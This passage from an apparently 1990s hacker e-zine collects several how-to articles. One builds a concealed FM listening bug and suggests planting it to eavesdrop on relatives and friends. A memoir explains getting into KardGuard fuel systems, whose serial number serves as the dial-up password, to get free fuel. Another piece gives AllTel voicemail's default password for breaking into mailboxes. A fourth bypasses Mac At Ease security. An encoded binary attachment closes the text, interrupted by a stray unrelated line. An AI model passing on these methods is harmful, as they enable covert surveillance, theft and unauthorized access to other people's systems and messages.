out there about electronics. If you do build it use it at your own risk.
You will need a decent knowledge of electronics and how to solder some
components. So if you dont know how to build electronic kits and want a
bug you can buy one ready-made from me, just write to the e-mail address
above. Ok enough crap.. so you ask what is an FM bug, well an FM bug is
like a tiny microphone that can transmit crystal clear audio to a near
by Walkman/stereo etc. The range of the bug we are making is about 800
meters, and the battery life is about 100hrs on a normal alkaline
battery. This bug however is not to be moved while in use, so you cant
put it in your pocket and walk around. There are other bugs on the
market but this I found to be the most reliable and relatively easy to
build. The actual size of the PCB is only 2cm X 2cm! However the battery
is actually the biggest component. Some parts like the Surface Mount
resistors, air trimmer and electret microphone maybe hard to find. I
find mail-order catalogs are the best source of parts as they have a
bigger range than a store like Dick Smith. I did not actually design
this circuit, Talking Electronics did, but felt everyone out there might
like to know how to build one of these. The surface mount resistors can
be replaced with normal resistors but I recommend using the surface
mount resistors as they give more of an educational experience to this
project <puke> <puke> If you dont have a clue how to build a bug and
have no knowledge of electronics whatsoever e-mail me and you can
purchase one pre-built from me.
COMPONENT LIST
Resistors
1- 470 R surface mount
1- 10k surface mount
1- 47k surface mount
1- 68k surface mount
1- 1M surface mount
Capacitors
1- 10p disc ceramic
1- 39p disc ceramic
1- 1n disc ceramic
2- 22n disc ceramics
1- 100n monoblock (monolithic)
1- Air trimmer 2p-10p
Other
2- BC 547 transistors
1- 5 turn coil 0.5mm enameled wire
1- electret mic insert- high sensitivity
1- 9V battery snap
1- 15cm tinned copper wire
1- 30cm fine solder
1- 170cm antenna wire
NOTE: use 170cm of electrical wire for the antenna, this length will give
you maximum range, however since the antenna wire needs to be extended
when bugging the concealability might be a factor. You can shorten the
wire's length but this will shorten the range yet make it easier to
conceal. Weigh the factors and do whats right for you.
ASSEMBLY OF CIRCUIT
First familiarize yourself with the layout of the components.
Now the only polarized (parts that have to put around the right way) are
the two transistors, the battery and the microphone. All other parts can
be soldered either way around. I recommend using this order for assembly
as it is the most practical and easiest way to build the bug.
1. 5 surface mount resistors.
2. 6 capacitors.
3. 2 transistors.
4. air trimmer
5. 5-turn coil.
6. battery snap.
7. microphone.
8. antenna wire.
READING RESISTOR AND CAPACITOR VALUES
If you dont know how to read the value of a surface mount
resistor or disc ceramic capacitor read on.
Surface mount resistor: These have three numbers, with the first two
digits being multiplied by the third. The third digit represents how
many zeros after the first two. For example a surface mount resistor
with code 1-0-5 would mean that the first two digits (1-0) would be
multiplied by 5 zeros. To give the value 10 00000ohms or 1Mohm.
Capacitor: These are similar to the above but the base number is pF or
pico farads. eg a capacitor labeled 2-2-3 has the value of 22 000pF.
HOW IT WORKS
The FM bug circuit consists of two stages: an audio amplifier
and a RF oscillator stage.
1.THE AUDIO AMPLIFIER STAGE
The microphone detects audio in the form of air vibrations that
enter the hole at the end of the microphone and move the diaphragm. The
diaphragm is a thin piece of metalised plastic and is charged during
manufacture. Some of these vibrations pass down a lead which touches it
to and into a FET transistor. A FET transistor has a very high input
impedance and does not have a loading effect on the charges. The audio
then gets passed through a BC 547 transistor which amplifies the sound
around seventy times. The BC547 then passes it to the base of the
oscillator stage.
2.THE OSCILLATOR STAGE
The 47k resistor picks up the pulse from the transistor and then
turns the second or oscillator transistor ON, but the 47k resistor has a
value so that it will not turn the transistor on fully. So the feedback
pulse from the 10p capacitor turns it ON fully.
Normally a transistor is turned ON/OFF via the base, however it
can be also done by holding the base firm and differing the emitter
voltage. In the FM bug this is whats done, the 1p capacitor holds the
base firm and the 10p feedback capacitor differs the emitter voltage.
However for a capacitor to do this the emitter must have a DC voltage
that can be increased and decreased. The DC voltage is about 2V and the
base will be 0.6V higher than this so the base voltage is fixed at 2.6V
by the 1p capacitor. The voltage does not rise or fall when the
oscillator is operating only when the audio is injected into the base
via the 100n capacitor. This is how the circuit works and continues like
this at a rate of about 100 million times per second.
The oscillator is designed to operate at around 100mhz, however
this figure is dependent on a lot of factors such as the 6 turn coil,
the 10p capacitor and 470R and 47k resistors also and the figure of
operation is about 90mhz (my FM bug operated at 88.5mhz).
GETTING THE BUG READY FOR ACTION
Ok so you have built the bug now and are ready to use it. Well
first of all you will need some sort of FM radio. Alright put the bug
next to or near the radio's antenna. Turn the bug and the radio on.
Alright starting from the bottom end of the radio's FM scale. Slowly
progress your way through the FM band. Usually your bug will tend to be
around the 85-95mhz range. Once you hear a beep (because your bug is
close to the radio) or any other strange static noise stop. Alright you
might have been lucky and your bug is exactly tuned already, however in
most cases you will need to adjust your bug slightly. Using a small
screwdriver slowly turn the air trimmer, whilst doing this babble out
some words, stop turning until the echo of your voice through the radio
becomes crystal clear. Your bug is now tuned and you are ready to put it
to use.
You might have some problems with your bugs frequency being
exactly same as a radio stations. No problem, by compressing or
uncompressing the coil you can change your bugs frequency. Use the coil
method if your bug is in the middle of a few radio stations frequencies,
if you just need to move it up or down one or two mhz then use the air
trimmer.
PUTTING THE BUG TO USE
Many of you already have your ideas on how to use the bug.
Remember it might be illegal in your Country/State/city to use this bug
in the way you intend. Hey its up to you I dont mind, however I take no
responsibility if you get in trouble.
Anyway here are a few "friendly methods":
1. CHRISTMAS. Yes it will soon be that time of year again, and
this time also brings a great opportunity to discover some of those
family secrets or maybe even find out what lame presents those relatives
have brought you and save you from the disappointed face they will see
when you open it.
Okay put the bug either in the pot the tree is standing in or
fasten it to a branch relatively close to the bottom of the tree. We
place it at the bottom of the tree because the antenna needs to be
extended if we want really cool range. Okay put the bug in its position
and then unravel the wire all over the tree.
2. TV listening. Okay if you are out in the backyard whether it
because you want to, or there is some chore that needs to be done. You
can listen to a favorite TV show, or a basketball game or such. I know
your saying why not listen to the radio, well you now have a choice of
listening to a radio station or one of the 10000000 TV channels your
state offers you.
Set the bug up about 3-5m away from the TV, then adjust the TV
volume so that it is just right to hear on your radio.
3. Bug-a-friend. Okay you can bug your friend to see what he/she
is up to. Okay you will need to know where your friend goes and then
previously go there and set up the bug and your listening point. Make
sure that you set up a place where conversation happens, it is very
boring listening to insects and such.
Conceal the bug anywhere within a 3-5m radius of where your
friend talks and stuff. Now conceal yourself and then sit back and
listen.
Now there are a few of the more "legally friendly" methods,
there are thousands more not-so-friendly and even malicious
methods <Oooooooo> that I will leave up to your imagination.
CONCLUSION
I hope the information contained can help you successfully build a bug,
and then good luck using it. If you have trouble just e-mail me. If you
can not get hold of some of the components, you can order them through
me. Also if you want a bug, but dont have the electronic skill to do it,
you can buy pre-built bugs through me.. just e-mail me. may the force be
with you
Obi-1.
------------------------------------------------------------------------------
My short time as a hacker.
by Kwoody
I live in a small town in northern British Columbia where the city
owns the phone company. All of BC is serviced by BCTel, except here in
Prince Rupert. The phone company used, up until 1991, mechanical
switches, no lie! Tech dating back to the 50's sometime. I know this
because I know some of the workers of CityTel. (The name of the phone
company). Because of this they were not able to offer all the goodies
like Caller ID, Call Forward etc...and it was easy to hack then, not
the phone company, but all the other systems in this small town of
16000+ people.
I got into hacking sort of accidently. I have had a computer and modem
of one kind or other since about 1983. I moved here after high school
in 1986 and found a good paying job I have worked at for the last 8
years. One night night in 1990 I was sitting around with my roommate
having a few beers and decided to call a buddy of ours to come over
but I dialed the number wrong and got a computer tone. Cool I
thought... I knew the numbers of the 2 local BBS's and that wasnt one
of them.
I fired up the computer and called it again. I got the prompt:
Xenix 386 Login:.
I had some knowledge of other OS's and knew this was some kind of Unix
box. A friend of my roomie was going to university (UBC) and he
happened to phone that night. I chatted with him for a bit and told
him what I had found. He told me to try sysadm or root. I got in with
sysadm, no password!
I found that I had complete control of the system and it belonged to
the local school board. I bought a book on Unix and learned as much as
I could about the system and Unix in general. I guess being a rookie
(read lamer?) and not knowing shit about how to cover my tracks they
discovered the system had been hacked and shut down the dial-in. They
went back online a few weeks later and left sysadm wide open no
password again. I could not believe it! Even after being hacked they
still left their system open like that.
By now I was hooked and I wanted to see if there were any other
systems in town. I could program a little in Pascal and basic (lame)
and tried to write a dialer of some kind. No go...so instead I figured
out the script language of Q-modem and wrote a 40 line script that
worked. It dialed all numbers sequentially but I did not worry too
much about being caught since the switch they used was so ancient
because they didnt have caller ID or anything like that yet.
I did not know at this time of the hacker community and some of the
programs available that would do this already. And even if I did I
wouldnt have known where to call and get them. At any rate I had two
computers an XT and a 386 both with modems and two phone lines, one I
used as my normal voice line and one for data. I setup the dialer on
both and away I went. By the time I had finished scanning both the
prefixes, 624 and 627, I found about 30 computers. Of those I was able
to get into about 10. All of them used defaults and all except the one
below were Unix boxes.
Although I did find one number that connected at 1200 I think it
belonged to the phone company. After I was connected nothing would
happen. I tried for a while to get a prompt of some kind then suddenly
a line of text appeared that listed two phone numbers and some other
stuff that I cant remember. So I just left it alone for a while to see
what came up. It soon became clear that the numbers in one column were
always one of 4 numbers. RCMP, Fire Dept, Battered Womens Shelter and
a second RCMP detachment. It looked like it recorded all calls coming
into those 4 places.
One hack I did was on a system that dispensed fuel. It was called a
KardGuard 3000C. I knew of two places in town that had these systems.
One was where I worked and the other was our competitor. And since I
knew how it worked it was easy to get in. I saw their volume of fuel
dispensed and such and could have done really nasty things like erase
their transaction buffer or get free fuel from them. But I didnt since
I did not see the point in hurting them or their system even if they
were our competitor.
For those of you who might find such a system I'll give a brief run
down on it. The hardware is limited to 300 bps 7E1 and consists of a
few things.
You can tell the system as it announces it when you connect:
KardGuard 3000C Motor Fuel Dispensing System.
PASSWORD:
The system uses punch coded cards read by a card-reader. You have a 4
digit security code that you need to activate the pump to dispense
fuel. Everything is kept track of by a computer that reads the amount
of fuel pumped, date, card number and a few other things depending on
how the card is coded. Like odometer reading or car number.
Now to get into this system via dial-in all you have to know is the
Serial Number of the system. All of these type systems use the serial
number as the default password to access it via dial-up. And its easy
to get the serial number. If you know the location of the card-reader
go and look on the side of it. Generally the actual card reader is
housed in a metal box. On the side of the card reader itself near the
back is a small sticker and the serial number will be written on the
sticker. That was how I did it. I just went to their card reader and
took the serial number off it and got in.
Once in you can do any number of things. Shut off the pumps or
manually activate them without a card and get free fuel, see how much
of any product was dispensed. Products range from 0-15. 0 being
regular gas, 1 regular unleaded etc. It is fairly limited of what you
can do but you can do some nasty stuff to the company who owns it if
you know how. A note to this all commands must be UPPERCASE. And all
commands are one letter. Like E is for looking up the 4 digit code for
individual cards. I dont remember all of them as we upgraded to the
latest version of the KardGuard which supports up to 14.4k and is a
faster system.
After about 3 months of this sort of stuff I was at work one Saturday
and got a phone call from a Constable Burke of the RCMP Special
Investigation Unit.
He informed me that he knew about my hacking and would like to take a
look at my computers. I told him that I didnt know what he was talking
about, he just said we could do this the hard way and he could get a
warrant to search the place. He wanted to meet me at my place in 10
minutes. I said ok. I was shitting bricks by this time. I phoned my
roomie and told him to get all printouts and disks out of the house
and take them away...anywhere. I took off home and got there to find
my roomie gone with all printouts and disks. I fired up the computers
and formatted both HD's. Formatting a hard drive had never taken so
long before!!
I waited for like an hour...no sign of the cops. My roomie came back
and said where are the cops? I dont know I told him. I waited some
more still no sign of them. I got a call about 3 hours later from a
friend of my roomie and he asked if Constable Burke had showed up. I
asked how he knew about that and all he did was laugh his ass off! Now
I was thinking joke...bad joke...and it was. I managed to find out
that this "friend" had gotten someone to pose as a police officer and
call me to see my computers regarding hacking. Well the guy he got to
pose as a cop did a good job at fooling me. I guess I was just over
paranoid by this time. Plus I was really pissed as I lost a lot of
info that I had acquired over the previous months when I formatted my
hard drives.
I guess my roommate had been telling a few people about what I was
doing. I was more than a little pissed off at him as I had not told a
soul of what I was doing since I knew it was illegal as hell. I got my
disks back and burned the printouts and laid off the hacking for a few
weeks. I started up again and was a tad more careful. I didnt keep any
printouts and kept the info on disk to a minimum.
Then about a month later my roommate, who worked for our landlord,
came home one day and said that our landlord had been approached by
some RCMP officer regarding me and my computers and what I might be
doing with them. I said is this another joke? No he said, go talk to
him yourself. I did but he wouldnt tell me much except that something
was definitely going on regarding me, my phones and my computers. And
the RCMP were involved.
After asking around I found out that quite a few people knew what I
had been up too. All they knew is that I was some guy who had been
cracking systems in town. But word had spread and I still dont know
how the cops found out or how much they knew.
But after talking to my landlord I quit right there and then. I went
home formatted the drives again, all floppies and got rid of
everything. I had hacked my way through everything in town that I
could in about 6 months. Also by this time CityTel had upgraded their
switch to some of the latest tech and had Caller-ID installed along
with all the other goodies you can get these days. It was definitely
time to quit.
Not long after I started a BBS that I still run to this day. I figured
that was a way to kill the hacking urge and be legit. I dont live with
that roommate anymore. I'm married now and still think about it now
and again but have too much to lose if I do and get caught.
On another note about 3 months ago I was at work and dialed a wrong
number. As fate would have it I got a blast of modem tone in my ear.
My old hacker curiosity came alive and I made note of the number. We
have a small lan at work that has a modem attached and when I had a
free moment I dialed the number up. I got the banner:
city telephones. No unauthorized use.
xxxxxxx <----a bunch of numbers
username:
I hung up right there but it was interesting to see that I had found
CityTel's switch or something of that nature.
To this day I dont know if there were any other hackers in this small
city where I live. As far as I know I was the only one that did any of
this sort of thing. It was fun but near the end I could feel the noose
around my neck. And I quit while the quitting was good.
Today I help admin our small lan at work with 2 servers and 8
workstations and the Unix I learned hacking helped me when my boss
first started to get serious about computerizing the business. Since
then I have been able to help setup and maintain the systems we have
today.
I'll give the specs on our new KardGuard if anyone is interested as I
know they come from the States and there must be more than a few out
there.
kwoody
------------------------------------------------------------------------------
USING ALLTEL VMBs
By Leper Messiah
Ok. This is everything you need to know in hacking AllTel Mobile's
Voice Mail. The default password on all their boxes is 9999.
Here are the docs, word for word. Enjoy!
-----------------------------------------------------------------------------
Features
-=Basic=-
Accessing your mailbox
Changing your security code
Recording your name
Recording a personal greeting
Playing a message
Recovering deleted messages
Playback mode options
-=Enhanced=-
All of the Basic Features plus...
Setting up your greeting schedule
Replying to a message
Redirecting a message
Recording and sending a message
Creating a broadcast list
Personal greeting schedule
At a glance
VOICE MAIL SET UP Press
To change your security code 8 2 3
To record your name response 2 3 3
To record your personal greeting 2 2 3
To edit a greeting in your schedule 2 2 7
To activate your greeting schedule 2 2 8
To change your playback mode 8 8 3
SENDING AND RECEIVING MESSAGES
To play a message 1
To save and play the next message 2
To reply to a message 3
To redirect a message 7
To create and send a message 3
Accessing your Voice Mail
1. Access your Voice Mail.
From a cellular phone press
# 9 9 Send.
From a landline phone dial your
cellular phone number, which will
automatically transfer to your voice
mail and press # when greeting begins.
2. Enter your security code.
Creating/Changing your security code
1. Access your Voice Mail.
2. Press 8 for Personal Options.
3. Press 2 3 to change your security code.
* Note: Your security code can contain 1 to 7 digits.
Recording your name
1. Access your Voice Mail.
2. Press 2 for your Greeting Menu.
3. Press 3 3 to record your name.
4. Record your name, finish by pressing #.
Options
Press 3 1 to play your name.
Press 3 3 to erase and re-record your name.
Recording a personal greeting
1. Access your Voice Mail.
2. Press 2 for Greeting Menu.
3. Press 2 1 to play your greeting.
4. Press 2 3 to record your greeting,
record your greeting, finish by pressing #.
Playing a message
1. Access your Voice Mail.
2. Press 1 to play your messages.
3. Message will play.
Options
Press 1 to keep this message
as new and play the next.
Press 2 to save and play the
next message.
Press 3 to reply to a message.
Press 4 4 to replay a message.
Press 5 to erase a message.
Press 7 to redirect the message.
Press 8 8 3 from the main
menu to choose a playback mode.*
Continue to press 8 3 until the
desired playback mode is selected.
* Note: The system has three playback modes:
normal, automatic, and simplified.
Recovering deleted messages
To recover a message that has been deleted: **
Press * 1 to go to the main menu,
Press * 4 to recover all deleted messages.
** Note: Deleted messages can only be recovered
before you exit the mailbox.
Replying to a message
From the Play Menu:
1. Press 3 during or after a message.
2. Record your reply finish by pressing #.
3. Press 3 to continue recording a voice message.
Press 5 to erase a message.
Press 7 to select a special delivery option.
4. Press 9 to address the message.
If sent from a subscriber's mailbox,
the reply with be automatic. If not, enter
the mailbox number.
Redirecting a message
From the Play Menu:
1. Press 7 during or after a message.
2. Press 3 to continue recording a
voice message.
Press 5 to erase a voice comment.
Press 7 to select a special delivery
option.
Press 8 to play the original message.
3. Press 9 to address the redirected message.
Enter:
a. mailbox number
b. broadcast list number.
Recording and sending a message
1. Access your Voice Mail.
2. Press 3 to record a message.
3. Record your message finish by
pressing #.
Press 3 to continue recording a
voice message.
Press 4 4 to review the
recorded message.
Press 5 to erase a message.
Press 7 to select a special
delivery option.
Press 1 to mark a message urgent.
Press 2 to mark a message confidential.
Press 3 to select notification of non-delivery.
Press 4 for future delivery.
Press 5 to delete special delivery tags.
4. Press 9 to address a message.
Enter:
mailbox number
broadcast list
0 + last name - 0 + first name
Creating or editing a broadcast list
1. Access your Voice Mail.
2. Press 6 to access your broadcast list.
3. Press 3 to create or edit a broadcast list.
4. Enter a one- or two-digit broadcast
list number. If new list, select any one-
or two- digit number. If editing, enter
the one- or two- digit number assigned.
5. Enter all of the destinations.
Press # after each destination entry.
(destinations can be mailbox
number or broadcast list numbers.)
6. Press 7 3 to record a name for
your broadcast list.
7. Press # when finished.
Setting up your greeting schedule.
1. Press 2 from main menu.
2. Press 2 6 to select your active greeting.
3. Enter the greeting number you want active.
4. Press 2 7 to edit a greeting.
5. Enter the greeting number to be edited.
Press 1 to play the current greeting.
Press 3 to record a greeting.
Press 5 to erase the greeting.
Press 7 to change the time
interval for this greeting.
Press 8 to review the time interval
for greeting.
6. Press 2 8 to activate/deactivate
your greeting schedule.
Message waiting notification
1. Press 8 for Personal Options menu.
2. Press 6 for Notification Options.
3. Press 1 to play notification telephone number.
Options
Press 6 to enable/disable
message notification.
AT ANY TIME DURING A MESSAGE PRESS
To rewind by 6 seconds 4
To rewind to the beginning of a message 4 4
To fast forward by 6 seconds 6
To fast forward to the end 6 6
of the message
To replay the date and time stamp 8 8
To stop and function #
To return to the main menu * 1
-----------------------------------------------------------------------------
Good luck hacking.
-- Leper Messiah
-----------------------------------------------------------------------------
Hacking At Ease for the Macintosh.................. By: Ace
Introduction:
Some educational institutions and businesses use At Ease to
discourage the pirating of programs and access to sensitive files, and
generally screwing up any fun you would have! Wouldn't it be nice to
know how to be rid of it??
How to:
Well, this will tell you how to remove the password for At Ease
so you can gain access to the Finder, and also let you change the
password to one of your chosing, really screwing some one up.
First off, the computer you will need a copy of Microsoft Word
5.1 or 6.0 (Norton Utilities Disk Editor will also work, and I'm
trying my best to find other programs that will allow you to do this).
Launch Microsoft Word and go to the "File" menu, and select "Open".
Now change the "File Type" to "All Files". Navigate to the Preferences
folder and open At Ease Preferences. It should look like a giant mess.
Somewhere in there is the password. It doesn't really matter where.
Select all of the text with Command-A and press the delete key, and
save the now empty file. Restart the computer. Now you can select "Go
to finder" from At Ease's menu.
Other Programs:
You can also use the following program called DisEase. There is
also a HyperCard stack that will bypass At Ease. I have used them both,
although I feel that using the above method is better.
___
/ _ \
/ / \ \
/ /___\ \ce
/ _______ \
/ / \ \
(This file must be converted with BinHex 4.0)
:#d4TFd9KFf8ZFfPd!&0*9%46593K!3!!!#iE!!!!!"Dd8dP8)3!"!!!Z'h*-BA8
#r`!!!"Err`d!"d4TFd9KFf8!!kB8!0phS!!4QKS!!!#!!!!!!!$RQdl"G!!!!!!
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!rrrrrd&38%a&390&)3#SX5K#U,)ak!!!Ah8
!!!!!!!!YP3!!!!"j!`!!!!!!!!!!E$d1!&h(r2bZe8l@f@95I#BhbSpfRTQlBe[
GZRV*IQ9bSprES-Z&df[JCqmPT`0qRTYYSl9`F1ZHk'ffA-rG'BYZdmh@@Mc22B!
l$RR#(H@AF$pG#19#YJrZK,aL9`cbK5mm9V&0&mVGP(YHjbP3A8F[Z9m'0cbI,(Q
Jj1#41AcbN!$F3JD3!"')6q"h8PH-5Bba
gemini - kennedy.gemi.dev
mcGJrH[PeSiT&&LDFRr84p'`Y1"`T
H-XZcQpSAV@Z[edU,Si45[DkYBqA5Q[!%i(X6Pji[IrK2h%jY*r0,JZVrURhm)I@
qG&NM4TfhhhBBFab8MT2Mj1"e831I@rZ*c4c'@MUhEVe8CEXkHc@(bj86S%Hrf3*
rjKa@cE)V9cXCUl&Nh[Lqp1D+fXC%G*kcE'qcNdVel4TMFPE#fE3J-Ijj6&9JDM'
ImQ&U!&1I5eGcj-m4HZ9cqB%2e6UCb[XU1cpPE`2c,BXHU'rTB!`-Kl3@PM0[%`X
i)kK8Cf`HZ$K$U#UFi95,-p6U2pELR&R)H$f%HJce@EFHAXM5KdU+@3ja*E6HQiR
Pam'bE9dMP!6$-HY3Vk%"imJ6M6Q%e9Y3&k!khCjU(YpEq9cfTV9lA'f@YL5hYA4
`E8Vb#j[(pjANpqSPqCA2qDhL6rG'#QXV1bYA-jC66+jTr#hV8+#B69rDYj!!pGj
49$[q#0ImNI6Q"EAMZphH&[3qZA!HIqqZI-jhSq$k@'TGbmDYpAI@lh#Y3%TP"1H
FHBb02l'kcfE[6cJ1&#J!Ef"qdYjQEZKSHQ"G"pN@H+`#hS%[8CAN3(e@q9cZPk(
TdbAPL)*ZG)p3PbC4IaV[ahSrC68Z,'IGm-6(hlH65H02eA!p2V1L[ReECpZ'qN9
YEG[D`1iVl(#UQ4hZI5Yr(P"k'Qk`EPPBlMMNQ'Mcq*-P1GDKG0hlDXGheJ9l[c%
jfpY+-aacC`0Mhih1'pqERf!jkaPl,RQHpIh`,CP9rN"N!r#kHqI#(`m"j5'ipI%
YM2hqQN4MpHDX&BR0UqYb9L8f-rC`AG`k4(Lp(rSI(T1HAEZRVJ+6F-$i!I6ZF([
$k-9)*HVhIVeZ$[!1Y$TpmmEr'AQimVQ-!B3!DRpG,["BR4qp64AcaTpUC*Q4bNl
RV*2#qaKr[q'FGXj8VXi-Pq4E,FjB&)N#$ImF'[kBkhCX`Fk"!@HB9fGj0E*Jjk2
h1ZFAl0bpfaRM9FBk"$IZXJkPYMY1lml#@UZapaR5)G@5'8Ph`2Zc5[,6l4bPqh"
q8DdcC+hK#,,@l!ceh&U5MdNC$Xm!F4MDIURh-kQY,&!bcaNk2$29l!`I"S2HAHL
FVh`Zkd[hlUR,KDrEJ$M@qpRm&LBjB`f$32KGcZFfMSZ8"2[fe(B@6Up(G90k3pd
F9j&jQGFA3QPdahSA@ifmrLDPZm!85B8N[DZqTG0XEGf+U+,%j1l)hj),Cf5*h(%
6MA!@0a(-"-i@hCq3!+6'i1BE9L5fA!Zfm',Qm4SS*hV1NCSpm-RmLcPDHpH1@Q,
L*RlUCllCFeTBS,#&j6r%SQTMhCElILI4Q,0jlGV%jTUkk"qICR,$XT+mG(Y*AUq
HfM,K&kiiCPbr6(ZJq&1pN6SG161AjA,2c#d[L'CY#5#Pj,TFfPfLcc2T)HRp5jL
kl+Hcqk"*"m[re-S1E)Z3!,8$#abc[T)j6AZ$-e55rb'H"V`DiGAj$e%Q$(f)dZ!
-ViBVJ0I)T$2D[-cT)dqcR!BQ[8(FZIY1TpXVjQ@HET`MNZ0`[TFC&iDdjXcT&$D
TN[c$-r(1J@0QHM23mh2TJeCMqP(+#1`(mpP59%[Br[3KGf13!+6T5)L(A$C2%XZ
D2BeCB(lfm#aJ202+![1!4,[%Pi"b9#3$9i1m-B3YDI(D2@jU#*Bl1-[Gll#%Jl0
QZbc,rcG,hmR,,$F`UMiRVEh)-JrZrCTJHIl(rj8PI#6p*jlE2ClN0BRe2ZpjlI`
M,[0E1229dYhT3eSq'1D8j00NqLaa5Mm+[ckEDXimRck,DJ$GiiF,h*QAq-b2d$f